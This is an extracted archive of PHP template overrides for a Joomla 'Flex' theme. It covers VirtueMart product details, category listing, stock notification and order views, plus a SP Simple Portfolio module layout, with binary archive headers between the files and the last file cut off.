                            <?php echo JText::_('VM_IN_STOCK'); ?>
                            <span><?php echo $this->product->product_in_stock; ?></span>
                        </div>
                    <?php } else { ?>
                        <div class="product-in-stock">
                            <i class="pe pe-7s-less"></i>
                            <?php echo JText::_('VM_OUT_OF_STOCK'); ?>
                        </div>
                    <?php } ?>
                <?php } ?>
                
                <?php echo shopFunctionsF::renderVmSubLayout('rating',array('showRating'=>$this->showRating,'product'=>$this->product)); ?>
                </div>
           
			</div>

		    <?php echo $this->product->event->afterDisplayTitle ?>

			<?php
			if (is_array($this->productDisplayShipments)) {
				echo '<div class="vm-product-shipments">';
			    foreach ($this->productDisplayShipments as $productDisplayShipment) {
					echo '<div class="vm-product-shipment">';
					echo $productDisplayShipment . '<br />';
					echo '</div>';
			    }
				echo '</div>';
			}
			
			//In case you are not happy using everywhere the same price display fromat, just create your own layout
			//in override /html/fields and use as first parameter the name of your file
			echo shopFunctionsF::renderVmSubLayout('prices',array('product'=>$this->product,'currency'=>$this->currency)); 
			
			echo shopFunctionsF::renderVmSubLayout('customfields',array('product'=>$this->product,'position'=>'ontop'));
			
			echo shopFunctionsF::renderVmSubLayout('customfields',array('product'=>$this->product,'position'=>'normal'));
			
		    ?>
    		<?php if (!empty($this->product->product_s_desc)) { ?>
		        <div class="product-short-description">
			       <h4><i class="pe pe-7s-note"></i><?php echo JText::_('VM_PRODUCT_SHORT_DESC');?></h4>
				    <?php
				    // Removed line because it was generating <br>: echo nl2br($this->product->product_s_desc);
					echo $this->product->product_s_desc;
				    ?>
		        </div>
		    <?php } // Product Short Description END ?>
			<?php
				// Manufacturer of the Product
				if (VmConfig::get('show_manufacturers', 1) && !empty($this->product->virtuemart_manufacturer_id)) {
				    echo '<div class="clear"></div><span class="product-manufacturer">' . vmText::_('COM_VIRTUEMART_PRODUCT_DETAILS_MANUFACTURER_LBL') . ':' . $this->loadTemplate('manufacturer') . '</span><div class="clear"></div>';	
				}
			?>
		    <div class="spacer-buy-area">
				<?php
				echo shopFunctionsF::renderVmSubLayout('addtocart',array('product'=>$this->product));

				echo shopFunctionsF::renderVmSubLayout('stockhandle',array('product'=>$this->product));
				?>
		    </div>
            
            <div class="clear"></div>
				<?php // Ask a question about this product ?>
				<?php if (VmConfig::get('ask_question', 0) == 1) {
					$askquestion_url = JRoute::_('index.php?option=com_virtuemart&view=productdetails&task=askquestion&virtuemart_product_id=' . $this->product->virtuemart_product_id . '&virtuemart_category_id=' . $this->product->virtuemart_category_id . '&tmpl=component', FALSE);
					?>
                    <div class="clear"></div>
					<div class="ask-a-question">
						<a class="ask-a-question" href="<?php echo $askquestion_url ?>" rel="nofollow" ><i class="fas fa-envelope"></i><?php echo vmText::_('COM_VIRTUEMART_PRODUCT_ENQUIRY_LBL') ?></a>
					</div>
				<?php } ?>
                
				<?php // Back To Category Button
				if ($this->product->virtuemart_category_id) {
					$catURL =  JRoute::_('index.php?option=com_virtuemart&view=category&virtuemart_category_id='.$this->product->virtuemart_category_id, FALSE);
					$categoryName = vmText::_($this->product->category_name) ;
				} else {
					$catURL =  JRoute::_('index.php?option=com_virtuemart');
					$categoryName = vmText::_('COM_VIRTUEMART_SHOP_HOME');
				}
				?>
				<div class="back-to-category">
			    	<a href="<?php echo $catURL ?>" class="product-details"><i class="fas fa-folder-open"></i><?php echo vmText::sprintf('COM_VIRTUEMART_CATEGORY_BACK_TO',$categoryName) ?></a>
				</div>
                
                
		    <?php
		    // Product Navigation
		    if (VmConfig::get('product_navigation', 1)) { ?>
            
            <hr style="width:100%;" />
            
		        <div class="product-neighbours">
				    <?php if (!empty($this->product->neighbours ['previous'][0])) {
					$prev_link = JRoute::_('index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id=' . $this->product->neighbours ['previous'][0] ['virtuemart_product_id'] . '&virtuemart_category_id=' . $this->product->virtuemart_category_id, FALSE);
					echo JHtml::_('link', $prev_link, $this->product->neighbours ['previous'][0] ['product_name'], array('rel'=>'prev', 'class' => 'previous-page', 'data-toggle' => 'tooltip', 'title' => $this->product->neighbours ['previous'][0] ['product_name'], 'data-dynamic-update' => '1'));
				    } else {
						echo '<span class="empty-previous-page fas fa-ban"></span> ';
					}
					if (!empty($this->product->neighbours ['next'][0])) {
					$next_link = JRoute::_('index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id=' . $this->product->neighbours ['next'][0] ['virtuemart_product_id'] . '&virtuemart_category_id=' . $this->product->virtuemart_category_id, FALSE);
					echo JHtml::_('link', $next_link, $this->product->neighbours ['next'][0] ['product_name'], array('rel'=>'next','class' => 'next-page','data-toggle' => 'tooltip', 'title' => $this->product->neighbours ['next'][0] ['product_name'],'data-dynamic-update' => '1'));
				    } else {
						echo '<span class="empty-next-page fas fa-ban"></span>';
					} ?>
                    
			    	
		        </div>
			    <?php } // Product Navigation END
			    ?>

			    <?php
			    // Product Edit Link
			    echo $this->edit_link;
			    // Product Edit Link END
			    ?>

		</div> <!--/.col-sm-7-->
		<div class="clear"></div>
    </div> <!--/.row-->

    <div style="margin-top:25px;" class="row">
	    <div class="col-sm-12">
        
          <?php 
		  		// PDF - Print - Email Icon
			    if (VmConfig::get('show_emailfriend') || VmConfig::get('show_printicon') || VmConfig::get('pdf_icon')) {
				?>
			        <div class="icons">
				    <?php

				    $link = 'index.php?tmpl=component&option=com_virtuemart&view=productdetails&virtuemart_product_id=' . $this->product->virtuemart_product_id;

					echo '<span class="pdf-icon">';
					echo $this->linkIcon($link . '&format=pdf', 'COM_VIRTUEMART_PDF', 'pdf_button', 'pdf_icon', false);
					echo '</span>';
					//echo $this->linkIcon($link . '&print=1', 'COM_VIRTUEMART_PRINT', 'printButton', 'show_printicon');
					echo $this->linkIcon($link . '&print=1', 'COM_VIRTUEMART_PRINT', 'printButton', 'show_printicon',false,true,false,'class="printModal"');
					$MailLink = 'index.php?option=com_virtuemart&view=productdetails&task=recommend&virtuemart_product_id=' . $this->product->virtuemart_product_id . '&virtuemart_category_id=' . $this->product->virtuemart_category_id . '&tmpl=component';
				    echo $this->linkIcon($MailLink, 'COM_VIRTUEMART_EMAIL', 'emailButton', 'show_emailfriend', false,true,false,'class="recommened-to-friend"');
				    ?>
			    	<div class="clear"></div>
			        </div>
			    <?php } // PDF - Print - Email Icon END
			    ?>
                
			<?php
			// event onContentBeforeDisplay
			echo $this->product->event->beforeDisplayContent; ?>

			<div class="products-desc-tab">
				<ul id="myTab" class="nav nav-tabs" role="tablist">
					<?php if (!empty($this->product->product_desc)) { ?>
                   
					<li role="presentation" class="active">
						<a href="#desc" aria-controls="desc" role="tab" data-toggle="tab">
							<i class="pe pe-7s-note"></i><?php echo vmText::_('VM_PRODUCT_DESC_TITLE') ?>
						 </a>
					</li>
				    <?php } // Product Description END 
					if ($this->showReview) { ?>
				 	<li role="presentation">
					  	<a href="#review" data-toggle="tab" aria-controls="review" role="tab">
						   <i class="pe pe-7s-like2"></i><?php echo JText::_('VM_PRODUCT_REVIEWS');?>
					  </a>
					</li>
                    <?php } ?>
				</ul>
			 
				<div class="tab-content">

					<?php if (!empty($this->product->product_desc)) { ?>
					    <div role="tabpanel" class="tab-pane desc fade active in" id="desc">
						    <div class="product-description">
								<?php /** @todo Test if content plugins modify the product description */ ?>
								<?php echo $this->product->product_desc; ?>
						    </div>
					    </div>
				    <?php } // Product Description END 
					if ($this->showReview) { ?>
				    <div role="tabpanel" class="tab-pane review" id="review">
				    	<?php echo $this->loadTemplate('reviews'); ?>
				 	 </div>
                     <?php } ?>
				</div>
                <div class="clear"></div>
                
			</div> <!--/. products-desc-tab-->
   
		

			
 <?php
		    // Product Packaging
			$product_packaging = '';
			if ($this->product->product_box) {
			?>
				<div class="product-box">
				<?php
					echo vmText::_('COM_VIRTUEMART_PRODUCT_UNITS_IN_BOX') .$this->product->product_box;
				?>
				</div>
			<?php } // Product Packaging END ?>
		
			<?php 
            echo shopFunctionsF::renderVmSubLayout('customfields',array('product'=>$this->product,'position'=>'onbot'));
            
            echo shopFunctionsF::renderVmSubLayout('customfields',array('product'=>$this->product,'position'=>'related_products','class'=> 'product-related-products','customTitle' => true ));
            
            echo shopFunctionsF::renderVmSubLayout('customfields',array('product'=>$this->product,'position'=>'related_categories','class'=> 'product-related-categories'));
            
            ?>
            
            <?php // onContentAfterDisplay event
            echo $this->product->event->afterDisplayContent;
            
            // Show child categories
            if ($this->cat_productdetails)  {
                echo $this->loadTemplate('showcategory');
            } ?>

		</div> <!--/.col-sm-12-->
	</div> <!--/.row-->

<?php
$j = 'jQuery(document).ready(function($) {
	$("form.js-recalculate").each(function(){
		if ($(this).find(".product-fields").length && !$(this).find(".no-vm-bind").length) {
			var id= $(this).find(\'input[name="virtuemart_product_id[]"]\').val();
			Virtuemart.setproducttype($(this),id);
		}
	});
});';
//vmJsApi::addJScript('recalcReady',$j);

if(VmConfig::get ('jdynupdate', TRUE)){

	/** GALT
	 * Notice for Template Developers!
	 * Templates must set a Virtuemart.container variable as it takes part in
	 * dynamic content update.
	 * This variable points to a topmost element that holds other content.
	 */
	$j = "Virtuemart.container = jQuery('.productdetails-view');
Virtuemart.containerSelector = '.productdetails-view';
//Virtuemart.recalculate = true;
";

vmJsApi::addJScript('ajaxContent',$j);

$j = "jQuery(document).ready(function($) {
$('[data-toggle=\"tooltip\"]').tooltip();Virtuemart.stopVmLoading();var msg = '';$('a[data-dynamic-update=\"1\"]').off('click', Virtuemart.startVmLoading).on('click', {msg:msg}, Virtuemart.startVmLoading);$('[data-dynamic-update=\"1\"]').off('change', Virtuemart.startVmLoading).on('change', {msg:msg}, Virtuemart.startVmLoading);var productCustomization=$('.cd-customization'),cart=$('.cd-cart'),animating=false;initCustomization(productCustomization);$('body').on('click',function(event){if($(event.target).is('body')||$(event.target).is('.cd-gallery')){deactivateCustomization()}});function initCustomization(items){items.each(function(){var actual=$(this),addToCartBtn=actual.find('.add-to-cart'),touchSettings=actual.next('.cd-customization-trigger');addToCartBtn.on('click',function(){if(!animating){animating=true;resetCustomization(addToCartBtn);addToCartBtn.addClass('is-added').find('path').eq(0).animate({'stroke-dashoffset':0},300,function(){setTimeout(function(){updateCart();addToCartBtn.removeClass('is-added').find('.addtocart-button').on('webkitTransitionEnd otransitionend oTransitionEnd msTransitionEnd transitionend',function(){addToCartBtn.find('path').eq(0).css('stroke-dashoffset','19.79');animating=false});if($('.no-csstransitions').length>0){addToCartBtn.find('path').eq(0).css('stroke-dashoffset','19.79');animating=false}},600)})}});touchSettings.on('click',function(event){event.preventDefault();resetCustomization(addToCartBtn)})})}function resetCustomization(selectOptions){selectOptions.siblings('[data-type=\"select\"]').removeClass('is-open').end().parents('.cd-single-item').addClass('hover').parent('li').siblings('li').find('.cd-single-item').removeClass('hover').end().find('[data-type=\"select\"]').removeClass('is-open')}function deactivateCustomization(){productCustomization.parent('.cd-single-item').removeClass('hover').end().find('[data-type=\"select\"]').removeClass('is-open')}function updateCart(){(!cart.find('.total_products').hasClass('items-added'))&&cart.find('.total_products').addClass('items-added').removeClass('empty_basket');var cartItems=cart.find('span'),text=parseInt(cartItems.text())+1;cartItems.text(text)}});";
vmJsApi::addJScript('vmPreloader',$j);
}

echo vmJsApi::writeJS();

if ($this->product->prices['salesPrice'] > 0) {
  echo shopFunctionsF::renderVmSubLayout('snippets',array('product'=>$this->product, 'currency'=>$this->currency, 'showRating'=>$this->showRating));
}

?>
</div>PK!��,�	�	@flex/html/com_virtuemart/productdetails/default_showcategory.phpnu&1i�<?php

// Check to ensure this file is included in Joomla!
defined ( '_JEXEC' ) or die ( 'Restricted access' );

	if ($this->category->haschildren) {
	    $iCol = 1;
	    $iCategory = 1;
	    $categories_per_row = VmConfig::get('categories_per_row', 3);
	    $category_cellwidth = ' width' . floor(100 / $categories_per_row);
	    $verticalseparator = " vertical-separator";
	    ?>

	    <div class="category-view">

		<?php
		// Start the Output
		if (!empty($this->category->children)) {
		    foreach ($this->category->children as $category) {

			// Show the horizontal seperator
			if ($iCol == 1 && $iCategory > $categories_per_row) {
			    ?>
		    	<div class="horizontal-separator"></div>
			    <?php
			}

			// this is an indicator whether a row needs to be opened or not
			if ($iCol == 1) {
			    ?>
		    	<div class="row productwrap">
				<?php
			    }

			    // Show the vertical seperator
			    if ($iCategory == $categories_per_row or $iCategory % $categories_per_row == 0) {
				$show_vertical_separator = ' ';
			    } else {
				$show_vertical_separator = $verticalseparator;
			    }

			    // Category Link
			    $caturl = JRoute::_('index.php?option=com_virtuemart&view=category&virtuemart_category_id=' . $category->virtuemart_category_id, FALSE);

			    // Show Category
				if (VmConfig::get('showcategory', 1)) {
			    ?>
                <div class="clear"></div>
			    <div class="category col-sm-6 col-md-<?php echo round(12/$categories_per_row) . $show_vertical_separator ?>">
                  <div class="spacer">
                      <div class="spacer-img">
                        <a href="<?php echo $caturl ?>">
                          <?php // if ($category->ids) {
                            echo $category->images[0]->displayMediaThumb("",false);
                            echo '<span class="overlay"><h3>'.vmText::_($category->category_name).'</h3></span>';
                          //} ?>
                          </a>
                      </div>
                  </div>
                </div>
			    <?php 
				}
			    $iCategory++;

			    // Do we need to close the current row now?
			    if ($iCol == $categories_per_row) {
				?>
		    	    <div class="clear"></div>
		    	</div>
			    <?php
			    $iCol = 1;
			} else {
			    $iCol++;
			}
		    }
		}
		// Do we need a final closing row tag?
		if ($iCol != 1) {
		    ?>
	    	<div class="clear"></div>
	        </div>
	<?php } ?>
	</div>
    <?php }PK!0Bd�
�
2flex/html/com_virtuemart/productdetails/notify.phpnu&1i�<?php
/**
 *
 * Show Notify page
 *
 * @package	VirtueMart
 * @subpackage
 * @author Max Milbers, Valerie Isaksen
 * @link https://virtuemart.net
 * @copyright Copyright (c) 2004 - 2010 VirtueMart Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
 * VirtueMart is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses.
 * @version $Id: default_reviews.php 5428 2012-02-12 04:41:22Z electrocity $
 */

// Check to ensure this file is included in Joomla!
defined ( '_JEXEC' ) or die ( 'Restricted access' );
// Implement Joomla's form validation
vmJsApi::vmValidator();
?>
<div class="vm-wrap">
  <h1><?php echo vmText::_('COM_VIRTUEMART_CART_NOTIFY') ?></h1>
  <div class="row-fluid clearfix">
  	<p><?php echo vmText::sprintf('COM_VIRTUEMART_CART_NOTIFY_DESC', $this->product->product_name); ?></p>
    <hr />
      <form class="form-validate" method="post" action="<?php echo JRoute::_('index.php?option=com_virtuemart&view=productdetails&virtuemart_product_id='.$this->product->virtuemart_product_id.'&virtuemart_category_id='.$this->product->virtuemart_category_id, FALSE) ; ?>" name="notifyform" id="notifyform">
        <label for="notify_email" class="vm-nodisplay"><?php echo vmText::_('COM_VIRTUEMART_EMAIL') ?></label>
        <input style="line-height:38px;height:38px;display:inline;min-width:27%;margin:5px auto;" class="required validate-email" id="notify_email" type="email" name="notify_email" value="<?php echo $this->user->email; ?>" placeholder="<?php echo vmText::_('COM_VIRTUEMART_EMAIL') ?>" title="<?php echo vmText::_('COM_VIRTUEMART_ENTER_A_VALID_EMAIL_ADDRESS') ?>" />
        <input style="margin:5px;" type="submit" name="notifycustomer" class="notify-button btn sppb-btn-primary validate" value="<?php echo vmText::_('COM_VIRTUEMART_CART_NOTIFY') ?>" title="<?php echo vmText::_('COM_VIRTUEMART_CART_NOTIFY') ?>" />
        <input type="hidden" name="virtuemart_product_id" value="<?php echo $this->product->virtuemart_product_id; ?>" />
        <input type="hidden" name="option" value="com_virtuemart" />
        <input type="hidden" name="virtuemart_category_id" value="<?php echo vRequest::getInt('virtuemart_category_id'); ?>" />
        <input type="hidden" name="virtuemart_user_id" value="<?php echo $this->user->id; ?>" />
        <input type="hidden" name="task" value="notifycustomer" />
        <input type="hidden" name="controller" value="productdetails" />
        <?php echo JHtml::_( 'form.token' ); ?>
      </form>
  </div>
</div>PK!^�%�

(flex/html/com_virtuemart/orders/list.phpnu&1i�<?php
/**
*
* Orderlist
* NOTE: This is a copy of the edit_orderlist template from the user-view (which in turn is a slighly
*       modified copy from the backend)
*
* @package	VirtueMart
* @subpackage Orders
* @author Oscar van Eijk
* @link http://www.virtuemart.net
* @copyright Copyright (c) 2004 - 2010 VirtueMart Team. All rights reserved.
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
* VirtueMart is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* @version $Id: list.php 8982 2015-09-14 09:45:02Z Milbo $
*/

// Check to ensure this file is included in Joomla!
defined('_JEXEC') or die('Restricted access');
?>
<div class="vm-wrap">
	<div class="vm-orders-list">
<h1><?php echo vmText::_('COM_VIRTUEMART_ORDERS_VIEW_DEFAULT_TITLE'); ?></h1>

<hr />
<?php
if (count($this->orderlist) == 0) {
	//echo vmText::_('COM_VIRTUEMART_ACC_NO_ORDER');
	 echo shopFunctionsF::getLoginForm(false,true);
	?>
		</div>
	</div>
	<?php
} else {
 ?>
<div id="editcell">
	<table class="adminlist" width="80%">
	<thead>
	<tr>
		<th>
			<?php echo vmText::_('COM_VIRTUEMART_ORDER_LIST_ORDER_NUMBER'); ?>
		</th>
		<th>
			<?php echo vmText::_('COM_VIRTUEMART_ORDER_LIST_CDATE'); ?>
		</th>
		<!--th>
			<?php //echo vmText::_('COM_VIRTUEMART_ORDER_LIST_MDATE'); ?>
		</th -->
		<th>
			<?php echo vmText::_('COM_VIRTUEMART_ORDER_LIST_STATUS'); ?>
		</th>
		<th>
			<?php echo vmText::_('COM_VIRTUEMART_ORDER_LIST_TOTAL'); ?>
		</th>
	</tr>
	</thead>
	<?php
		$k = 0;
		foreach ($this->orderlist as $row) {
			$editlink = JRoute::_('index.php?option=com_virtuemart&view=orders&layout=details&order_number=' . $row->order_number, FALSE);
			?>
			<tr class="<?php echo "row$k"; ?>">
				<td align="left">
					<a href="<?php echo $editlink; ?>" rel="nofollow"><?php echo $row->order_number; ?></a>
					<?php echo shopFunctionsF::getInvoiceDownloadButton($row) ?>
				</td>
				<td align="left">
					<?php echo vmJsApi::date($row->created_on,'LC4',true); ?>
				</td>
				<!--td align="left">
					<?php //echo vmJsApi::date($row->modified_on,'LC3',true); ?>
				</td -->
				<td align="left">
					<?php echo shopFunctionsF::getOrderStatusName($row->order_status); ?>
				</td>
				<td align="left">
					<?php echo $this->currency->priceDisplay($row->order_total, $row->currency); ?>
				</td>
			</tr>
	<?php
			$k = 1 - $k;
		}
	?>
	</table>
</div>
<?php } ?>


PK!o�����+flex/html/com_virtuemart/orders/details.phpnu&1i�<?php
/**
*
* Order detail view
*
* @package	VirtueMart
* @subpackage Orders
* @author Oscar van Eijk, Valerie Isaksen
* @link http://www.virtuemart.net
* @copyright Copyright (c) 2004 - 2010 VirtueMart Team. All rights reserved.
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
* VirtueMart is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* @version $Id: details.php 8832 2015-04-15 16:05:49Z Milbo $
*/

// Check to ensure this file is included in Joomla!
defined('_JEXEC') or die('Restricted access');
JHtml::stylesheet('vmpanels.css', JURI::root().'components/com_virtuemart/assets/css/');
if($this->print){
	?>

		<body onload="javascript:print();">
		<div class="vm-orders-vendor-image"><img src="<?php  echo JURI::root() . $this-> vendor->images[0]->file_url ?>"></div>
		<h2><?php  echo $this->vendor->vendor_store_name; ?></h2>
		<?php  echo $this->vendor->vendor_name .' - '.$this->vendor->vendor_phone ?>
		<h2><?php echo vmText::_('COM_VIRTUEMART_ACC_ORDER_INFO'); ?></h2>
		<div class="spaceStyle vm-orders-order print">
		<?php
		echo $this->loadTemplate('order');
		?>
		</div>

		<div class="spaceStyle vm-orders-items print">
		<?php
		echo $this->loadTemplate('items');
		?>
		</div>
		<?php if(!class_exists('VirtuemartViewInvoice')) require_once(VMPATH_SITE .DS. 'views'.DS.'invoice'.DS.'view.html.php');
		echo VirtuemartViewInvoice::replaceVendorFields($this->vendor->vendor_letter_footer_html, $this->vendor); ?>
		</body>
		<?php
} else {

	?>
<div class="vm-wrap">
	<div class="vm-orders-information">
	<h2><?php echo vmText::_('COM_VIRTUEMART_ACC_ORDER_INFO'); ?>

	<?php

	/* Print view URL */
	$details_link = "<a href=\"javascript:void window.open('$this->details_url', 'win2', 'status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=720,height=480,directories=no,location=no');\"  >";
	$details_link .= '<i class="pe pe-7s-print"></i>';
	//$button = 'system/printButton.png';
	//$details_link .= JHtml::_('image',$button, vmText::_('COM_VIRTUEMART_PRINT'), NULL, true);
	$details_link  .=  '</a>';
	echo $details_link;
	$this->orderdetails['details']['BT']->invoiceNumber = VmModel::getModel('orders')->getInvoiceNumber($this->orderdetails['details']['BT']->virtuemart_order_id);
	echo shopFunctionsF::getInvoiceDownloadButton($this->orderdetails['details']['BT']) ?>
    
    <?php if($this->order_list_link){ ?>
	    <div class="floatright">
		<a class="btn btn-default" href="<?php echo $this->order_list_link ?>" rel="nofollow"><?php echo vmText::_('COM_VIRTUEMART_ORDERS_VIEW_DEFAULT_TITLE'); ?></a>
	    </div>
	    <div class="clear"></div>
	<?php }?>
	</h2>
    <hr />

	<div class="spaceStyle vm-orders-order">
	<?php
	echo $this->loadTemplate('order');
	?>
	</div>

	<div class="spaceStyle vm-orders-items">
	<?php

	$tabarray = array();

	$tabarray['items'] = 'COM_VIRTUEMART_ORDER_ITEM';
	$tabarray['history'] = 'COM_VIRTUEMART_ORDER_HISTORY';

	shopFunctionsF::buildTabs ( $this, $tabarray); ?>
	</div>
	<br clear="all"/><br/>
	</div>
</div>	
	<?php
}

?>






PK!K�P�\5\5+flex/html/mod_spsimpleportfolio/default.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('_JEXEC') or die;
jimport( 'joomla.filesystem.file' );
$layout_type = $params->get('layout_type', 'default');
$column_bg = $params->get('column_bg');
$show_view_button = $params->get('show_view_button', 1);
$show_zoom_button = $params->get('show_zoom_button', 1);
$show_tags = $params->get('show_tags', 1);
$show_filter = $params->get('show_filter');
$filter_divider = $params->get('filter_divider');
$filter_style = $params->get('filter_style');
$show_all_txt = $params->get('show_all_txt');
$filter_margin = $params->get('filter_margin');
$video_width = $params->get('video_width');
$video_height = $params->get('video_height');

//Params
$cparams 	= JComponentHelper::getParams('com_spsimpleportfolio');
$square 	= strtolower( $cparams->get('square', '600x600') );
$rectangle 	= strtolower( $cparams->get('rectangle', '600x400') );
$tower 		= strtolower( $cparams->get('tower', '600x800') );

//Add js and css files
$doc = JFactory::getDocument();

//First unset default files
unset($doc->_styleSheets[ JURI::root(true) . '/components/com_spsimpleportfolio/assets/css/featherlight.min.css' ]);
unset($doc->_styleSheets[ JURI::root(true) . '/components/com_spsimpleportfolio/assets/css/spsimpleportfolio.css' ]);
unset($doc->_scripts[ JURI::root(true) . '/components/com_spsimpleportfolio/assets/js/jquery.shuffle.modernizr.min.js' ]);
unset($doc->_scripts[ JURI::root(true) . '/components/com_spsimpleportfolio/assets/js/featherlight.min.js' ]);
unset($doc->_scripts[ JURI::root(true) . '/components/com_spsimpleportfolio/assets/js/spsimpleportfolio.js' ]);

//Add updated js and css files
$doc->addStylesheet( JURI::root(true) . '/templates/flex/html/com_spsimpleportfolio/assets/css/featherlight.css' );
$doc->addStylesheet( JURI::root(true) . '/templates/flex/html/com_spsimpleportfolio/assets/css/featherlight.gallery.css' );
$doc->addStylesheet( JURI::root(true) . '/templates/flex/html/com_spsimpleportfolio/assets/css/spsimpleportfolio.css' );
$doc->addScript( JURI::root(true) . '/templates/flex/html/com_spsimpleportfolio/assets/js/jquery.shuffle.modernizr.min.js' );
$doc->addScript( JURI::root(true) . '/templates/flex/html/com_spsimpleportfolio/assets/js/featherlight.min.js' );
$doc->addScript( JURI::root(true) . '/templates/flex/html/com_spsimpleportfolio/assets/js/featherlight.gallery.min.js' );
$doc->addScript( JURI::root(true) . '/templates/flex/html/com_spsimpleportfolio/assets/js/spsimpleportfolio.js' );

$menu 	= JFactory::getApplication()->getMenu();
$itemId = '';
if(is_object($menu->getActive())) {
	$active = $menu->getActive();
	$itemId = '&Itemid=' . $active->id;
}

$filter_divider != '' ? $filter_divider = '<span class="simple-divider">'.$filter_divider.'</span>' : '';
$filter_style == 'simple' ? $simple_style = $filter_divider : $simple_style = '';

$showbtns = '';
if($show_zoom_button==0 && $show_view_button==0 && $layout_type=='default') { 
   $showbtns = '.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-overlay-wrapper .sp-simpleportfolio-overlay {background:transparent}';
}

$addstyle = 'body.rtl .sp-simpleportfolio .sp-simpleportfolio-filter > ul > li:first-child {'
	. 'margin-left:'.$filter_margin.'px;margin-right:0;'
	. '}'
	. $showbtns
	; 
$doc->addStyleDeclaration( $addstyle );

//random ID number to avoid conflict if there is more then one galleries on the same page
$randomid = rand(1,1000);

$i = 0;
//Sizes
$sizes = array(
	$rectangle,
	$tower,
	$square,

	$tower,
	$rectangle,
	$square,

	$square,
	$rectangle,
	$tower,

	$square,
	$tower,
	$rectangle
	);

?>

<div id="mod-sp-simpleportfolio" class="sp-simpleportfolio sp-simpleportfolio-view-items layout-<?php echo str_replace('_', '-', $layout_type); ?> <?php echo $moduleclass_sfx; ?>">
	<?php if($params->get('show_filter', 1)) { ?>
		<div class="sp-simpleportfolio-filter">
			<ul<?php echo ($params->get('filter_style') == 'simple') ? ' class="simple"' : ' class="flex"'; ?>>
				<li class="active<?php if($params->get('filter_margin') == 0) { ?> no-margin<?php } ?>" data-group="all"><a href="#">
                <?php if($params->get('show_all_txt') != '') { ?>
                   <?php echo $show_all_txt; ?>
                <?php } else { ?>
                  <?php echo JText::_('MOD_SPSIMPLEPORTFOLIO_SHOW_ALL'); ?>
                <?php } ?>
                </a></li>
				<?php
					$filters = SpsimpleportfolioHelper::getTagList( $items );
					foreach ($filters as $filter) { ?>
						<li<?php echo ($params->get('filter_margin') == 0) ? ' class="no-margin" ' : ' style="margin-left:'.$filter_margin.'px;" '; ?>data-group="<?php echo $filter->alias; ?>"><?php echo $simple_style; ?><a href="#"><?php echo $filter->title; ?></a></li>
				<?php }	?>
			</ul>
		</div>
	<?php } 
	$video_width != '' ? $video_width : $video_width = '700';
	$video_height != '' ? $video_height : $video_height = '400';
	$column_bg != '' ? $column_background = ' style="background-color:'.$column_bg.'"' : $column_background = '';
		//Videos
		foreach ($items as $item) {

			if($item->video) {
				$video = parse_url($item->video);

				switch($video['host']) {
					case 'youtu.be':
					$video_id 	= trim($video['path'],'/');
					$video_src 	= '//www.youtube.com/embed/' . $video_id;
					break;

					case 'www.youtube.com':
					case 'youtube.com':
					parse_str($video['query'], $query);
					$video_id 	= $query['v'];
					$video_src 	= '//www.youtube.com/embed/' . $video_id;
					break;

					case 'vimeo.com':
					case 'www.vimeo.com':
					$video_id 	= trim($video['path'],'/');
					$video_src 	= "//player.vimeo.com/video/" . $video_id;
				}
				echo '<iframe class="sp-simpleportfolio-lightbox" src="'. $video_src .'" width="'. $video_width .'" height="'. $video_height .'" id="sp-simpleportfolio-video'.$item->spsimpleportfolio_item_id.'" style="border:none;" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe>';
			}
		}
	?>
	<div class="sp-simpleportfolio-items sp-simpleportfolio-columns-<?php echo $params->get('columns', 3); ?>">
		<?php foreach ($items as $item) { 
			$tags = SpsimpleportfolioHelper::getTags( $item->spsimpleportfolio_tag_id );
			$newtags = array();
			$filter = '';
			$groups = array();
			foreach ($tags as $tag) {
				$newtags[] 	 = $tag->title;
				$filter 	.= ' ' . $tag->alias;
				$groups[] 	.= '"' . $tag->alias . '"';
			}

			$groups = implode(',', $groups);
			?>
			<div<?php echo $column_background; ?> class="sp-simpleportfolio-item" data-groups='[<?php echo $groups; ?>]'>
				<?php $item->url = JRoute::_('index.php?option=com_spsimpleportfolio&view=item&id='.$item->spsimpleportfolio_item_id.':'.$item->alias. ModSpsimpleportfolioHelper::getItemid()); ?>
				<div class="sp-simpleportfolio-overlay-wrapper clearfix">	
					<?php if($item->video) { ?>
						<span class="sp-simpleportfolio-icon-video"></span>
					<?php }
					
                    if($item->thumbnail) { 
						// New from SP Simple Portfolio 1.8 (additional thumbnail image)
						?>
                        <img class="sp-simpleportfolio-img" src="<?php echo $item->thumb; ?>" alt="<?php echo $item->title; ?>">
					<?php } else {
					if($params->get('thumbnail_type', 'masonry') == 'masonry') { ?>
						<img class="sp-simpleportfolio-img" src="<?php echo JURI::base(true) . '/images/spsimpleportfolio/' . $item->alias . '/' . JFile::stripExt(JFile::getName($item->image)) . '_' . $sizes[$i] . '.' . JFile::getExt($item->image); ?>" alt="<?php echo $item->title; ?>">
					<?php } else if($params->get('thumbnail_type', 'masonry') == 'rectangular') { ?>
						<img class="sp-simpleportfolio-img" src="<?php echo JURI::base(true) . '/images/spsimpleportfolio/' . $item->alias . '/' . JFile::stripExt(JFile::getName($item->image)) . '_'. $rectangle .'.' . JFile::getExt($item->image); ?>" alt="<?php echo $item->title; ?>">
					<?php } else { ?>
						<img class="sp-simpleportfolio-img" src="<?php echo JURI::base(true) . '/images/spsimpleportfolio/' . $item->alias . '/' . JFile::stripExt(JFile::getName($item->image)) . '_'. $square .'.' . JFile::getExt($item->image); ?>" alt="<?php echo $item->title; ?>">
					<?php } 
					} 
